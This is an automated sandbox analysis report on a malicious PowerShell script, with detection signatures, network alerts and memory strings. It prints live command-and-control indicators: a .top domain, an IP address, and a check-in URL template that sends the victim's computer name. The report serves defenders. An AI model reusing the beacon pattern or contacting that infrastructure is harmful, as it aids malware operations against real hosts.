Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1584337
MD5:99e9af1d265f8b0fc8e512e80f07d739
SHA1:7433e52e040e3d3c71e5514064b49bbbb25ea7c7
SHA256:aa7a1ee6564e0c793d61c6ab01555d316ca42bc71b7cf6c33a7cc66d5ccf48be
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7356 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7356, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7356, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-05T08:44:07.183699+010020577411A Network Trojan was detected192.168.2.44973045.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-05T08:44:05.964108+010028594881Domain Observed Used for C2 Detected192.168.2.4617361.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-05T08:44:07.183699+010018100002Potentially Bad Traffic192.168.2.44973045.61.136.13880TCP
2025-01-05T08:44:07.821517+010018100002Potentially Bad Traffic192.168.2.449731142.250.185.16480TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: download.ps1Virustotal: Detection: 15%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 90.4% probability
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbF source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1797817107.0000022F3B109000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbps1 source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1798952484.0000022F3B141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1798862238.0000022F3B130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1796663905.0000022F3AFFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1795254706.0000022F3A8D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb3 source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbOWD1 source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb9-00C04FB68820}\InprocServer32H source: powershell.exe, 00000000.00000002.1796663905.0000022F3AFFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1796663905.0000022F3AF5D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbf source: powershell.exe, 00000000.00000002.1797817107.0000022F3B066000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2859488 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.4:61736 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.4:49730 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 142.250.185.164:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49730 -> 45.61.136.138:80
Source: global trafficHTTP traffic detected: GET /trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kcehmenjdibnmni.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kcehmenjdibnmni.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3pGV6J5npDcmMyd9T3ewsWsQ-wLOq3z" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwjCyo_qit6KAxXngP0HHR_3FLQQnIcBCAU"><img alt="" height="32" src="https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png" width="32"><span>Score one final special offer for </span><a href="https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_2025%26utm_source%3Dhpp%26utm_medium%3Dgoogle%26utm_content%3Dcpy1&amp;source=hpp&amp;id=19046161&amp;ct=3&amp;usg=AOvVaw0o2kBUsvWMu1ycqjGPCIBX&amp;sa=X&amp;ved=0ahUKEwjCyo_qit6KAxXngP0HHR_3FLQQ8IcBCAY" rel="nofollow">NFL Sunday Ticket</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2025 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google equals www.youtube.com (Youtube)
Source: powershell.exe, 00000000.00000002.1787542760.0000022F3296E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3pGV6J5npDcmMyd9T3ewsWsQ-wLOq3z" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwjCyo_qit6KAxXngP0HHR_3FLQQnIcBCAU"><img alt="" height="32" src="https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png" width="32"><span>Score one final special offer for </span><a href="https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_2025%26utm_source%3Dhpp%26utm_medium%3Dgoogle%26utm_content%3Dcpy1&amp;source=hpp&amp;id=19046161&amp;ct=3&amp;usg=AOvVaw0o2kBUsvWMu1ycqjGPCIBX&amp;sa=X&amp;ved=0ahUKEwjCyo_qit6KAxXngP0HHR_3FLQQ8IcBCAY" rel="nofollow">NFL Sunday Ticket</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2025 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: href=https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_ equals www.youtube.com (Youtube)
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: href=https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_2025%26utm_source%3Dhpp%26utm_medium%3Dgoogle%26utm_content%3Dcpy1&amp;source=hpp&amp;id=19046161&amp;ct=3&amp;usg=AOvVaw0o2kBUsvWMu1ycqjGPCIBX&amp;sa=X&amp;ved=0ahUKEwjCyo_qit6KAxXngP0HHR_3FLQQ8IcBCAYP equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: kcehmenjdibnmni.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$byv6103m9dkfxgj/$x1pqhoetanrl2cv.php?id=$env:computername&key=$kiewrcbop&s=527
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1796525489.0000022F3AAE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft&
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23C6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kcehmenjdibnmni.top
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kcehmenjdibnmni.top/trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F24E10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F24AEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F24B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1757938142.0000022F22791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1757938142.0000022F22791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1787542760.0000022F3296E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F24113000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1787542760.0000022F3296E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1787542760.0000022F3296E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1757938142.0000022F2402C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.pngX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
